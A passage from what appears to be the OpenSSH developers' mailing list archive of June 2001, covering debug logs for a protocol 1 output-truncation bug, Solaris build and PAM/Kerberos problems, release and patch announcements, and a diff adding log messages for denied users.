-x -v -v -v fields 'yes |head -2000' | ( sleep 3 ; wc -l ) OpenSSH_2.9p1, SSH protocols 1.5/2.0, OpenSSL 0x0090581f debug1: Reading configuration data /home/pspencer/.ssh/config debug1: Reading configuration data /etc/ssh_config debug1: Seeding random number generator debug1: Rhosts Authentication disabled, originating port will not be trusted. debug1: restore_uid debug1: ssh_connect: getuid 483 geteuid 0 anon 1 debug1: Connecting to fields [128.100.216.11] port 22. debug1: temporarily_use_uid: 483/150 (e=0) debug1: restore_uid debug1: temporarily_use_uid: 483/150 (e=0) debug1: restore_uid debug1: Connection established. debug1: read PEM private key done: type DSA debug1: read PEM private key done: type RSA debug1: identity file /home/pspencer/.ssh/identity type 0 debug1: Remote protocol version 1.99, remote software version OpenSSH_2.9p1 debug1: match: OpenSSH_2.9p1 pat ^OpenSSH debug1: Local version string SSH-1.5-OpenSSH_2.9p1 debug1: Waiting for server public key. debug1: Received server public key (768 bits) and host key (1024 bits). debug3: check_host_in_hostfile: filename /home/pspencer/.ssh/known_hosts debug3: check_host_in_hostfile: filename /etc/ssh_known_hosts debug3: check_host_in_hostfile: match line 2 debug3: check_host_in_hostfile: filename /home/pspencer/.ssh/known_hosts debug3: check_host_in_hostfile: filename /etc/ssh_known_hosts debug3: check_host_in_hostfile: match line 2 debug1: Host 'fields' is known and matches the RSA1 host key. debug1: Found key in /etc/ssh_known_hosts:2 debug1: Encryption type: 3des debug1: Sent encrypted session key. debug1: Installing crc compensation attack detector. debug1: Received encrypted confirmation. debug1: Trying rhosts or /etc/hosts.equiv with RSA host authentication. debug1: Remote: Accepted for lpc13.fields.utoronto.ca [128.100.216.133] by /etc/hosts.equiv. debug1: Received RSA challenge for host key from server. debug1: Sending response to host key RSA challenge. debug1: Remote: Rhosts with RSA host authentication accepted. debug1: Rhosts or /etc/hosts.equiv with RSA host authentication accepted by server. debug3: clear hostkey 0 debug3: clear hostkey 1 debug3: clear hostkey 2 debug1: Sending command: yes |head -2000 debug1: Entering interactive session. debug1: fd 1 setting O_NONBLOCK debug1: Sending eof. Write failed flushing stdout buffer. debug1: Transferred: stdin 0, stdout 4096, stderr 0 bytes in 0.4 seconds debug1: Bytes per second: stdin 0.0, stdout 9599.6, stderr 0.0 debug1: Exit status 141 1024 % From dunlap at apl.washington.edu Sat Jun 16 09:40:32 2001 From: dunlap at apl.washington.edu (John Dunlap) Date: Fri, 15 Jun 2001 16:40:32 -0700 (PDT) Subject: ssh & pipe In-Reply-To: from "Philip Spencer" at Jun 15, 2001 06:22:27 PM Message-ID: <200106152340.f5FNeWP03880@henry.apl.washington.edu> > > On Fri, 15 Jun 2001, Markus Friedl wrote: > > > do you have a ssh -v -v -v output for your test case? > > Yes; attached is the output from running > > ./ssh -1 -n -x -v -v -v fields 'yes | head -2000' | ( sleep 3 ; wc -l ) > > However, the additions you mentioned from the OpenBSD current CVS do fix > the problem (without having to remove the set_nonblock lines); thanks! > My experience had been only with protocol 2 which works fine in all the tests below. I see errors only using protocol 1 and then only when using head -20000. I am able to reliably see the failure using stock 2.9p1 when the client is slow (RHL6.2, P1/166) and the server is fast (RHL7.1, P3/933) the number of lines is greater than 2048. Using publickey auth with agent will fail when the client is fast and the server is slow but works using password auth. # this works with both password and publickey auth with agent slow $ ssh -1 -n -x fast 'yes | head -2000' | ( sleep 3 ; wc -l ) # this fails with both password auth and publickey with agent slow $ ssh -1 -n -x fast 'yes | head -20000' | ( sleep 3 ; wc -l ) # this works if using password auth but not if publickey with agent fast $ ssh -1 -n -x slow 'yes | head -20000' | ( sleep 3 ; wc -l ) The debugging outputs are below. henry is fast. fluke is slow. -- John --------------------- cut here ------------------------------------- henry # (ssh -1 -n -x -v -v -v fluke 'yes | head -20000' | ( sleep 3 ; wc -l ) ) 1>h1 2>&1 henry # cat h1 --------------------- cut here ------------------------------------- OpenSSH_2.9p1, SSH protocols 1.5/2.0, OpenSSL 0x0090600f debug1: Reading configuration data /usr/local/etc/ssh_config debug1: Applying options for * debug1: Seeding random number generator debug1: Rhosts Authentication disabled, originating port will not be trusted. debug1: restore_uid debug1: ssh_connect: getuid 0 geteuid 0 anon 1 debug1: Connecting to fluke [128.95.96.98] port 22. debug1: temporarily_use_uid: 0/0 (e=0) debug1: restore_uid debug1: temporarily_use_uid: 0/0 (e=0) debug1: restore_uid debug1: Connection established. debug1: read PEM private key done: type DSA debug1: read PEM private key done: type RSA debug1: identity file /root/.ssh/identity type 0 debug1: Remote protocol version 1.99, remote software version OpenSSH_2.9p1 debug1: match: OpenSSH_2.9p1 pat ^OpenSSH debug1: Local version string SSH-1.5-OpenSSH_2.9p1 debug1: Waiting for server public key. debug1: Received server public key (768 bits) and host key (1024 bits). debug3: check_host_in_hostfile: filename /root/.ssh/known_hosts debug3: check_host_in_hostfile: match line 1 debug3: check_host_in_hostfile: filename /root/.ssh/known_hosts debug3: check_host_in_hostfile: match line 1 debug1: Host 'fluke' is known and matches the RSA1 host key. debug1: Found key in /root/.ssh/known_hosts:1 debug1: Encryption type: 3des debug1: Sent encrypted session key. debug1: Installing crc compensation attack detector. debug1: Received encrypted confirmation. debug1: Trying RSA authentication via agent with 'dunlap at henry.apl.washington.edu' debug1: Server refused our key. debug1: Trying RSA authentication via agent with 'root at henry.apl.washington.edu' debug1: Received RSA challenge from server. debug1: Sending response to RSA challenge. debug1: Remote: RSA authentication accepted. debug1: RSA authentication accepted by server. debug3: clear hostkey 0 debug3: clear hostkey 1 debug3: clear hostkey 2 debug1: Sending command: yes |head -20000 debug1: Entering interactive session. debug1: fd 1 setting O_NONBLOCK debug1: fd 2 setting O_NONBLOCK debug1: Sending eof. Write failed flushing stdout buffer. debug1: Transferred: stdin 0, stdout 4096, stderr 0 bytes in 0.2 seconds debug1: Bytes per second: stdin 0.0, stdout 21395.0, stderr 0.0 debug1: Exit status 0 2048 --------------------- cut here ------------------------------------- fluke # ( ssh -1 -n -x -v -v -v henry 'yes | head -20000' | ( sleep 3 ; wc -l ) ) > f1 2>&1 fluke # cat f1 OpenSSH_2.9p1, SSH protocols 1.5/2.0, OpenSSL 0x0090581f debug1: Reading configuration data /usr/local/etc/ssh_config debug1: Applying options for henry debug1: Applying options for * debug1: Seeding random number generator debug1: Rhosts Authentication disabled, originating port will not be trusted. debug1: restore_uid debug1: ssh_connect: getuid 0 geteuid 0 anon 1 debug1: Connecting to henry [128.95.96.159] port 22. debug1: temporarily_use_uid: 0/0 (e=0) debug1: restore_uid debug1: temporarily_use_uid: 0/0 (e=0) debug1: restore_uid debug1: Connection established. debug1: read PEM private key done: type DSA debug1: read PEM private key done: type RSA debug1: identity file /root/.ssh/identity type 0 debug1: Remote protocol version 1.99, remote software version OpenSSH_2.9p1 debug1: match: OpenSSH_2.9p1 pat ^OpenSSH debug1: Local version string SSH-1.5-OpenSSH_2.9p1 debug1: Waiting for server public key. debug1: Received server public key (768 bits) and host key (1024 bits). debug3: check_host_in_hostfile: filename /root/.ssh/known_hosts debug3: check_host_in_hostfile: match line 5 debug3: check_host_in_hostfile: filename /root/.ssh/known_hosts debug3: check_host_in_hostfile: match line 5 debug1: Host 'henry' is known and matches the RSA1 host key. debug1: Found key in /root/.ssh/known_hosts:5 debug1: Encryption type: 3des debug1: Sent encrypted session key. debug1: Installing crc compensation attack detector. debug1: Received encrypted confirmation. debug1: Trying RSA authentication via agent with 'root at fluke.apl.washington.edu' debug1: Received RSA challenge from server. debug1: Sending response to RSA challenge. debug1: Remote: RSA authentication accepted. debug1: RSA authentication accepted by server. debug3: clear hostkey 0 debug3: clear hostkey 1 debug3: clear hostkey 2 debug1: Requesting authentication agent forwarding. debug1: Sending command: yes | head -20000 debug1: Entering interactive session. debug1: fd 1 setting O_NONBLOCK debug1: fd 2 setting O_NONBLOCK debug1: Sending eof. Write failed flushing stdout buffer. debug1: Transferred: stdin 0, stdout 4096, stderr 0 bytes in 0.1 seconds debug1: Bytes per second: stdin 0.0, stdout 46880.0, stderr 0.0 debug1: Exit status 0 2048 --------------------- cut here ------------------------------------- From mouring at etoh.eviladmin.org Sat Jun 16 09:35:30 2001 From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Fri, 15 Jun 2001 18:35:30 -0500 (CDT) Subject: EOL problem with channels.h in CVS In-Reply-To: <480995445.992618440@ZATHROS> Message-ID: I don't see this in the OpenBSD nor Portable tree. - Ben On Fri, 15 Jun 2001, Carson Gaspar wrote: > channels.h from today's CVS has MS-DOS ^M end-of-line chars. > > -- > Carson Gaspar - carson at taltos.org > Queen trapped in a butch body > From markus.friedl at informatik.uni-erlangen.de Sat Jun 16 18:36:02 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Sat, 16 Jun 2001 10:36:02 +0200 Subject: Patch for stdout/stderr buffer flush write() handling In-Reply-To: <480910633.992618356@ZATHROS>; from carson@taltos.org on Fri, Jun 15, 2001 at 03:19:16PM -0700 References: <480910633.992618356@ZATHROS> Message-ID: <20010616103602.B2139@folly> On Fri, Jun 15, 2001 at 03:19:16PM -0700, Carson Gaspar wrote: > The attached patch against today's CVS improves write() error handling and > logging in clientloop.c when flushing stdout/stderr. you can get EAGAIN if the fd is blocking? -------------- next part -------------- A non-text attachment was scrubbed... Name: clientloop.c.diff Type: application/octet-stream Size: 966 bytes Desc: not available Url : http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20010616/6fc00f17/attachment.obj From markus.friedl at informatik.uni-erlangen.de Sat Jun 16 18:46:36 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Sat, 16 Jun 2001 10:46:36 +0200 Subject: SFTP Logging In-Reply-To: <20010615103749.A25892@dour.org>; from jason@dour.org on Fri, Jun 15, 2001 at 10:37:49AM -0400 References: <3B29568A.9E2BC874@bartlett.house> <20010614075814.A24420@dour.org> <3B29568A.9E2BC874@bartlett.house> <20010614202029.B1274@zax.half.pint-stowp.cx> <20010614075814.A24420@dour.org> <3B29568A.9E2BC874@bartlett.house> <20010615103749.A25892@dour.org> Message-ID: <20010616104636.B14300@folly> On Fri, Jun 15, 2001 at 10:37:49AM -0400, Jason A . Dour wrote: > On Fri, Jun 15, 2001 at 10:27:54AM +1000, Andrew Bartlett wrote: > > Remember that it will amout to moot unless you use a restricted > > shell, like the one I have posted to this list earlier, as > > otherwise users can just use their own SFTP server - without your > > logging capabilities. > > True. But I'm also coding such a shell to meet my needs for > SFTP/SCP restricted users only. And I'm also spelunking the OpenSSH > codebase to see about separating authentication and authorization. > > I don't know if authent/auhtoriz separation has been discussed > before, but regardless of the authentication method I've allowed, I > need to restrict what a user can do. I havne't come up with a clear > solution yet, but I've a few ideas forming... is authorization openssh's job? i'm not sure. you could move all the authorization logic into a different layer, e.g. a special login shell. From jason at dour.org Sun Jun 17 01:29:48 2001 From: jason at dour.org (Jason A . Dour) Date: Sat, 16 Jun 2001 11:29:48 -0400 Subject: SFTP Logging In-Reply-To: <20010616104636.B14300@folly>; from markus.friedl@informatik.uni-erlangen.de on Sat, Jun 16, 2001 at 10:46:36AM +0200 References: <3B29568A.9E2BC874@bartlett.house> <20010614075814.A24420@dour.org> <3B29568A.9E2BC874@bartlett.house> <20010614202029.B1274@zax.half.pint-stowp.cx> <20010614075814.A24420@dour.org> <3B29568A.9E2BC874@bartlett.house> <20010615103749.A25892@dour.org> <20010616104636.B14300@folly> Message-ID: <20010616112948.A26580@dour.org> On Sat, Jun 16, 2001 at 10:46:36AM +0200, Markus Friedl wrote: > On Fri, Jun 15, 2001 at 10:37:49AM -0400, Jason A . Dour wrote: > > I don't know if authent/auhtoriz separation has been discussed > > before, but regardless of the authentication method I've allowed, I > > need to restrict what a user can do. I havne't come up with a clear > > solution yet, but I've a few ideas forming... > > is authorization openssh's job? Not necessarily. But it presently is partly its job by the fact that certain levels of authorization can take place when you use key-based authentication. Being able to limit what commands are allowed, intituting override commands, and the like that are possible with key-based auth, I would like to do with any authentication specified as valid. > i'm not sure. you could move all the authorization logic > into a different layer, e.g. a special login shell. True. I had actually given this some thought, but I didn't want to duplicate the work done with key-based authorization. So I was wondering if it made more sense to include it into that code and then make openssh's authorization work for all authentications. I already have a basic SFTP only restricted shell, and it works quite nicely. It would be nice to have it scan a config file for its information for some finer-grained control, but before I started down that path I wanted to evaluate putting such code into the server proper. Has any of this been discussed before? Am I covering old ground? If so, I'd love to see the archives of the previous discussions in case there are some pitfalls that have been discussed. Cheers, Jason # "Jason A. Dour" http://dour.org/ # Founder / Executive Producer - PJ Harvey Online - http://pjh.org/ From carson at taltos.org Sun Jun 17 06:57:31 2001 From: carson at taltos.org (Carson Gaspar) Date: Sat, 16 Jun 2001 13:57:31 -0700 Subject: Patch for stdout/stderr buffer flush write() handling In-Reply-To: <20010616103602.B2139@folly> References: <20010616103602.B2139@folly> Message-ID: <218401578.992699851@athyra> --On Saturday, June 16, 2001 10:36 AM +0200 Markus Friedl wrote: > On Fri, Jun 15, 2001 at 03:19:16PM -0700, Carson Gaspar wrote: >> The attached patch against today's CVS improves write() error handling >> and logging in clientloop.c when flushing stdout/stderr. > > you can get EAGAIN if the fd is blocking? Not on any UNIX I know of, but that's not the point. EAGAIN is a non-fatal error, and we've just encountered a situation where another part of the code made the fd non-blocking. The old code couldn't handle this, and died. After the patch, it will do the right thing no matter what. This makes the code more resilient to bizarre OS behaviour, and to intentional or unintentional code changes. -- Carson From markus.friedl at informatik.uni-erlangen.de Sun Jun 17 19:01:38 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Sun, 17 Jun 2001 11:01:38 +0200 Subject: Patch for stdout/stderr buffer flush write() handling In-Reply-To: <218401578.992699851@athyra>; from carson@taltos.org on Sat, Jun 16, 2001 at 01:57:31PM -0700 References: <20010616103602.B2139@folly> <218401578.992699851@athyra> Message-ID: <20010617110138.A19661@folly> On Sat, Jun 16, 2001 at 01:57:31PM -0700, Carson Gaspar wrote: > > > --On Saturday, June 16, 2001 10:36 AM +0200 Markus Friedl > wrote: > > > On Fri, Jun 15, 2001 at 03:19:16PM -0700, Carson Gaspar wrote: > >> The attached patch against today's CVS improves write() error handling > >> and logging in clientloop.c when flushing stdout/stderr. > > > > you can get EAGAIN if the fd is blocking? > > Not on any UNIX I know of, but that's not the point. EAGAIN is a non-fatal > error, and we've just encountered a situation where another part of the > code made the fd non-blocking. The old code couldn't handle this, and died. but this was the right thing to do. otherwise we had a busy loop. so it lead to the discovery of an actual bug. > After the patch, it will do the right thing no matter what. This makes the > code more resilient to bizarre OS behaviour, and to intentional or > unintentional code changes. From don-temp52998413 at isis.compsvcs.com Sun Jun 17 15:54:34 2001 From: don-temp52998413 at isis.compsvcs.com (Don Cohen) Date: Sat, 16 Jun 2001 22:54:34 -0700 (PDT) Subject: getnameinfo failed Message-ID: <200106170554.f5H5sY708379@isis.compsvcs.com> I'm running openssh-2.3.0p1 in linux. scp -P 2222 -v user at 207.224.119.73:openssh-2.3.0p1.tar /tmp/junk gives me Executing: program /usr/local/bin/ssh host 207.224.119.73, user user, command scp -v -f openssh-2.3.0p1.tar ssh_connect: getnameinfo failed I get that 3 times and then it gives up. I've changed ssh_connect as follows: if (getnameinfo(ai->ai_addr,ai->ai_addrlen, ntop, sizeof(ntop), strport,sizeof(strport), NI_NUMERICHOST|NI_NUMERICSERV) != 0) { error("ssh_connect: getnameinfo failed"); *** commented out next line continue; and now after the getnameinfo failed message it continues ... The authenticity of host '207.224.119.73' can't be established. and then everything works. I'm trying to understand what that getnameinfo is meant to accomplish. Is there any problem with removing it? Does it have anything to do with this authenticity check and how is authenticity supposed to be established? Thanks. From ecashin at terry.uga.edu Mon Jun 18 02:03:31 2001 From: ecashin at terry.uga.edu (Ed L Cashin) Date: 17 Jun 2001 12:03:31 -0400 Subject: no // comments, please In-Reply-To: <15146.33528.118362.897059@darkwing.uoregon.edu> References: <15146.33528.118362.897059@darkwing.uoregon.edu> Message-ID: Steve VanDevender writes: > Non-gcc compilers tend not to like C++-style // comments in plain C > code, as I discovered when trying to build the latest snapshot > (20010615) with the Tru64 UNIX C compiler. It doesn't matter (practically speaking), since some compilers haven't caught up, and folks also use old ones anyway, but those "//" comments *are* part of the C programming language as defined by the C99 ISO standard. -- --Ed Cashin PGP public key: ecashin at terry.uga.edu http://www.terry.uga.edu/~ecashin/pgp/ From mouring at etoh.eviladmin.org Mon Jun 18 03:50:53 2001 From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Sun, 17 Jun 2001 12:50:53 -0500 (CDT) Subject: no // comments, please In-Reply-To: Message-ID: It's still best to avoid using them. Mainly for the fact that it's not accepted as part of the OpenBSD coding style. Besides it has already been taken care of in the -CURRENT branch. Come to think about it. I'm unsure if it was dealt within branch 2.9. - Ben On 17 Jun 2001, Ed L Cashin wrote: > Steve VanDevender writes: > > > Non-gcc compilers tend not to like C++-style // comments in plain C > > code, as I discovered when trying to build the latest snapshot > > (20010615) with the Tru64 UNIX C compiler. > > It doesn't matter (practically speaking), since some compilers haven't > caught up, and folks also use old ones anyway, but those "//" comments > *are* part of the C programming language as defined by the C99 ISO > standard. > > -- > --Ed Cashin PGP public key: > ecashin at terry.uga.edu http://www.terry.uga.edu/~ecashin/pgp/ > > From djm at mindrot.org Mon Jun 18 17:01:15 2001 From: djm at mindrot.org (Damien Miller) Date: Mon, 18 Jun 2001 17:01:15 +1000 (EST) Subject: Portable OpenSSH 2.9p2 Message-ID: Portable OpenSSH 2.9p2 has just been uploaded and shall be making its way to the mirrors listed at http://www.openssh.com/portable.html shortly. This release fixes the "cookies" file deletion problem reported on BUGTRAQ as well as a few other minor (non-security) bugs. No new features have been added in this release. Regards, Damien Miller -- | Damien Miller \ ``E-mail attachments are the poor man's | http://www.mindrot.org / distributed filesystem'' - Dan Geer From simon at sxw.org.uk Mon Jun 18 21:14:46 2001 From: simon at sxw.org.uk (Simon Wilkinson) Date: Mon, 18 Jun 2001 12:14:46 +0100 Subject: GSSAPI patch for OpenSSH 2.9p2 In-Reply-To: References: Message-ID: <01061812144602.05052@loki.dcs.ed.ac.uk> A new version of the GSSAPI patch is available from http://www.sxw.org.uk/computing/patches/openssh.html This has been updated for 2.9p2. It includes a number of minor bug fixes, and adds support for removing credentials caches upon connection completion. Thanks once again to Chris Chiappa, Nalin Dahyabhai, Bill Fithen, Karsten Huneycutt, John Kilburg, Daniel Kouril, Dan Russell and Von Welch for their contributions. -- Simon Wilkinson http://www.sxw.org.uk From alexander.kurz at qsc.de Tue Jun 19 00:39:06 2001 From: alexander.kurz at qsc.de (Alexander Kurz) Date: Mon, 18 Jun 2001 16:39:06 +0200 Subject: make scp more script-capable Message-ID: <3B2E128A.3B7C6192@qsc.de> Hi, here's a proposal of a new ssh/scp-feature: ------------------------------------------------------- please implement a timeout with non-zero error-returncode on "Are you sure you want to continue connecting (yes/no)?" ------------------------------------------------------- My situation: recently I have implemented a cronjob that is using scp. Due to organizational reasons, the hostname of the remote machine changed. The problem that came up at this point, is this the message came up: akurz at dev157-34:~ > ssh someuser at somehost.mydomanin.de The authenticity of host 'someuser at somehost.mydomanin.de' can't be established. RSA key fingerprint is 00:12:4a:fc:33:80:71:70:4b:bb:e4:9d:16:c7:30:62. Are you sure you want to continue connecting (yes/no)? BUT: i did not see the message, becaus i have discarded it via scp someuser at somehost.mydomanin.de:~/somefiles* . >/dev/null So the script hung whithout complaining. If there was some timeout-functionality, i could easily check scp's returncode and create a nice error-message regards, Alexander Kurz, akur at qsc.de From dwd at bell-labs.com Tue Jun 19 02:16:51 2001 From: dwd at bell-labs.com (Dave Dykstra) Date: Mon, 18 Jun 2001 11:16:51 -0500 Subject: Default Path in sshd_config In-Reply-To: <3B2A8A13.67050307@globalstar.com>; from crist.clark@globalstar.com on Fri, Jun 15, 2001 at 03:20:03PM -0700 References: <3B2A8A13.67050307@globalstar.com> Message-ID: <20010618111651.A11573@lucent.com> On Fri, Jun 15, 2001 at 03:20:03PM -0700, Crist Clark wrote: > I was just building binary Solaris packages of OpenSSH for use at > our company. While doing so, it occurred to me that the only thing > that really stops me from being able to make a binary build totally > relocatable in the filesystem tree is the default path. Other than > that, I cannot think of any file path that cannot be modified with > either a command line option or in a configuration file. > > Is there a reason that, for example, > > DefaultPath /opt/openssh/bin > > Could not be something put into the sshd_config file? Or does this > exist in the code, but not (or I missed it) in the documentation? > > (Oh, and I still need to hack around with the manpages by hand to > get them to work in Solaris, but I think that is a known issue?) > -- > Crist J. Clark Network Security Engineer > crist.clark at globalstar.com Globalstar, L.P. > (408) 933-4387 FAX: (408) 933-4926 There are more compiled-in defaults than that; if you do a 'strings' on all the binaries you'll see them. There's at least the 'primes' file, and if you use the built-in prng there's also the 'ssh_prng_cmds' file. I use my general-purpose binary relocater, available at http://www.bell-labs.com/project/nsbd/breloc.html - Dave Dykstra From reillye at yahoo.com Tue Jun 19 02:50:44 2001 From: reillye at yahoo.com (Eileen Reilly-Horch) Date: Mon, 18 Jun 2001 09:50:44 -0700 (PDT) Subject: Building on Solaris 8 - RAND_add (etc) errors Message-ID: <20010618165044.65456.qmail@web13302.mail.yahoo.com> I was running into the problem building OpenSSH on Solaris that many others reported - configure failed stating: configure:4354: checking for OpenSSL directory configure:4411: cc -o conftest -g -I/usr/local/include -I/usr/include -I/usr/local/ssl/include -L/usr/local/lib -L/usr/local/ssl/lib -R/usr/local/lib -R/usr/local/ssl/lib conftest.c -lz -lsocket -lnsl -lgen -lcrypto 1>&5 Undefined first referenced symbol in file RAND_add conftest.o RAND_status conftest.o ld: fatal: Symbol referencing errors. No output written to conftest configure: failed program was: #line 4397 "configure" #include "confdefs.h" The solution to this problem that I found is to build OpenSSL with 32 bit support only (i.e, do ./config - do NOT do ./Configure solaris64-sparcv9-cc), then configure OpenSSH. I hope this helps! Eileen Reilly-Horch __________________________________________________ Do You Yahoo!? Spot the hottest trends in music, movies, and more. http://buzz.yahoo.com/ From misawa at bnl.gov Tue Jun 19 03:26:08 2001 From: misawa at bnl.gov (Shigeki Misawa) Date: Mon, 18 Jun 2001 13:26:08 -0400 (EDT) Subject: openssh-2.9p2 with PAM and Kerberos 5 on Solaris 8 Message-ID: <15150.14768.619459.432326@gargle.gargle.HOWL> Hi. Has anyone been able to get Openssh-2.9p2 or p1 or Openssh-2.5.2p2 to work with the Kerberos 5 PAM on Solaris 8 ? More specifically, I am trying to get the system to work with Kerberos 5 only (no pam_unix). My attempts to get things running result in the following messages from ssh (client side): > user at ssh-gateway's password: > client: Requesting pty. > client: Requesting X11 forwarding with authentication spoofing. > client: Requesting shell. > client: Entering interactive session. > Last login: Mon Jun 18 13:01:05 2001 from client.domain > debug1: PAM establishing creds > Command terminated on signal 10. On the server side I get: > debug1: PAM setting tty to "/dev/pts/4" > debug1: PAM establishing creds > debug1: Entering interactive session. > debug1: fd 9 setting O_NONBLOCK > debug1: fd 10 IS O_NONBLOCK > debug1: server_init_dispatch_13 > debug1: server_init_dispatch_15 > debug1: Received SIGCHLD. > debug1: End of interactive session; stdin 0, stdout (read 93, sent 93), stderr 0 bytes. > I am running with a /etc/pam.conf file as follows: other auth required /usr/lib/security/$ISA/pam_krb5.so.1 other account required /usr/lib/security/$ISA/pam_krb5.so.1 other session required /usr/lib/security/$ISA/pam_krb5.so.1 other password required /usr/lib/security/$ISA/pam_krb5.so.1 try_first_pass The system is running with the latest PAM patch 109805-03 Other things of interest are, kinit works fine and in /var/adm/messages I see messages like : Jun 18 13:08:49 ssh-server sshd[1406]: [ID 390226 user.error] PAM-KRB5:Could not obtain principal name Also, if I configure things to run with only pam_unix everything works. Any suggestions would be appreciated. Thanks. Shigeki Misawa RHIC Computing Facility Brookhaven National Laboratory From Dean.M.Knape at NJIT.EDU Tue Jun 19 03:58:54 2001 From: Dean.M.Knape at NJIT.EDU (Knape, Dean) Date: Mon, 18 Jun 2001 13:58:54 -0400 Subject: multiply-defined error during make Message-ID: Hello All, During the make of openssh-2.9 on solaris 5.8 make failed with the following error: ld: fatal: symbol `des_check_key' is multiply-defined: (file /xxx/xxx/solaris/admin/sys/krb4/lib/libdes.a(set_key.o) and file / xxx/xxx/solaris/openssl/lib/libcrypto.a(set_key.o)); ld: fatal: symbol `des_set_odd_parity' is multiply-defined: (file /xxx/xxx/solaris/admin/sys/krb4/lib/libdes.a(set_key.o) and file / xxx/xxx/solaris/openssl/lib/libcrypto.a(set_key.o)); ld: fatal: symbol `des_is_weak_key' is multiply-defined: My configure included the following options: --prefix=/xxx/xxx/solaris/ssh --sysconfdir=/etc/ssh --with-kerberos4=/xxx/xxx/solaris/admin/sys/krb4 --with-afs --with-ssl-dir=/xxx/xxx/solaris/openssl --with-tcp-wrappers --with-pid-dir=/etc/ssh Any suggestions on how to correct this? thanks, dean From Darren.Moffat at eng.sun.com Tue Jun 19 04:00:15 2001 From: Darren.Moffat at eng.sun.com (Darren Moffat) Date: Mon, 18 Jun 2001 11:00:15 -0700 (PDT) Subject: openssh-2.9p2 with PAM and Kerberos 5 on Solaris 8 Message-ID: <200106181800.f5II0wG375254@jurassic.eng.sun.com> >Has anyone been able to get Openssh-2.9p2 or p1 or Openssh-2.5.2p2 to >work with the Kerberos 5 PAM on Solaris 8 ? More specifically, I am >trying to get the system to work with Kerberos 5 only (no pam_unix). I can confirm that this does NOT work, I think it is a bug but at the moment I don't know if it is OpenSSH or the pam_krb5 module (I suspect the later) I'll look into it. -- Darren J Moffat From rachit at ensim.com Tue Jun 19 05:45:27 2001 From: rachit at ensim.com (Rachit Siamwalla) Date: Mon, 18 Jun 2001 12:45:27 -0700 Subject: make scp more script-capable Message-ID: <9AC41B8C4781464695BB013F106FCA31D2BE46@nasdaq.ms.ensim.com> i believe changing ssh_config "BatchMode yes" would fix that problem. BatchMode is designed for use in scripts, if a question needs to be asked, it will fail. -rchit -----Original Message----- From: Alexander Kurz [mailto:alexander.kurz at qsc.de] Sent: Monday, June 18, 2001 7:39 AM To: openssh-unix-dev at mindrot.org Subject: make scp more script-capable Hi, here's a proposal of a new ssh/scp-feature: ------------------------------------------------------- please implement a timeout with non-zero error-returncode on "Are you sure you want to continue connecting (yes/no)?" ------------------------------------------------------- My situation: recently I have implemented a cronjob that is using scp. Due to organizational reasons, the hostname of the remote machine changed. The problem that came up at this point, is this the message came up: akurz at dev157-34:~ > ssh someuser at somehost.mydomanin.de The authenticity of host 'someuser at somehost.mydomanin.de' can't be established. RSA key fingerprint is 00:12:4a:fc:33:80:71:70:4b:bb:e4:9d:16:c7:30:62. Are you sure you want to continue connecting (yes/no)? BUT: i did not see the message, becaus i have discarded it via scp someuser at somehost.mydomanin.de:~/somefiles* . >/dev/null So the script hung whithout complaining. If there was some timeout-functionality, i could easily check scp's returncode and create a nice error-message regards, Alexander Kurz, akur at qsc.de From dwd at bell-labs.com Tue Jun 19 06:55:45 2001 From: dwd at bell-labs.com (Dave Dykstra) Date: Mon, 18 Jun 2001 15:55:45 -0500 Subject: Patch for changing expired passwords Message-ID: <20010618155545.A5924@lucent.com> The primary purpose of the attached patches is for portable OpenSSH to support changing expired passwords as specified in shadow password files. To support that, I did a couple enhancements to the base OpenBSD OpenSSH code. They are: 1. Consolidated the handling of "forced_command" into a do_exec() function in session.c. These were being handled inconsistently and allocated memory was not always being properly freed. 2. Added log messages to say why a user is disallowed by allowed_user() in session.c. Those two changes are in attachment #1, against the current OpenBSD OpenSSH CVS. I hope Markus will accept them. Attachment #2 contains additional changes against the portable OpenSSH CVS to invoke the 'passwd' command whenever a shadow password entry expires and a pseudo-tty is available. This approach is similar to what was used by SSH 1.2.27, but more robust because 1.2.27 would attempt to change a password when there was no pty and fail (not to mention that it didn't work on Linux at all because the Linux "passwd" command only permits root to pass a username), and 1.2.27 gave no clue to the user as to why it was asking for the password. I decided that the 1.2.27 sshd_config option ForcedPasswdChange was not worth putting in because I can't see why anybody would want to turn it off and always deny expired passwords (as currently happens in OpenSSH); if somebody wants to completely expire an account on a specific date, there's a separate field for that in the shadow password file. I have tested these changes on Solaris 2.7, Linux 2.4, Irix 6.2, and Unixware 1.1.2. Apply attachment #1 first, then attachment #2 to the current portable OpenSSH CVS. Attachment #3 is a single patch file for all the changes against OpenSSH_2.9p2 in case anybody else on the list wants to try it. - Dave Dykstra -------------- next part -------------- *** auth.c.O Mon Jun 18 09:31:58 2001 --- auth.c Mon Jun 18 09:35:08 2001 *************** *** 68,83 **** shell = (pw->pw_shell[0] == '\0') ? _PATH_BSHELL : pw->pw_shell; /* deny if shell does not exists or is not executable */ ! if (stat(shell, &st) != 0) return 0; ! if (!((st.st_mode & S_IFREG) && (st.st_mode & (S_IXOTH|S_IXUSR|S_IXGRP)))) return 0; /* Return false if user is listed in DenyUsers */ if (options.num_deny_users > 0) { for (i = 0; i < options.num_deny_users; i++) ! if (match_pattern(pw->pw_name, options.deny_users[i])) return 0; } /* Return false if AllowUsers isn't empty and user isn't listed there */ if (options.num_allow_users > 0) { --- 68,92 ---- shell = (pw->pw_shell[0] == '\0') ? _PATH_BSHELL : pw->pw_shell; /* deny if shell does not exists or is not executable */ ! if (stat(shell, &st) != 0) { ! log("User %.100s not allowed because shell %.100s does not exist", ! pw->pw_name, shell); return 0; ! } ! if (!((st.st_mode & S_IFREG) && (st.st_mode & (S_IXOTH|S_IXUSR|S_IXGRP)))) { ! log("User %.100s not allowed because shell %.100s is not executable", ! pw->pw_name, shell); return 0; + } /* Return false if user is listed in DenyUsers */ if (options.num_deny_users > 0) { for (i = 0; i < options.num_deny_users; i++) ! if (match_pattern(pw->pw_name, options.deny_users[i])) { ! log("User %.100s not allowed because listed in DenyUsers", ! pw->pw_name); return 0; + } } /* Return false if AllowUsers isn't empty and user isn't listed there */ if (options.num_allow_users > 0) { *************** *** 85,97 **** if (match_pattern(pw->pw_name, options.allow_users[i])) break; /* i < 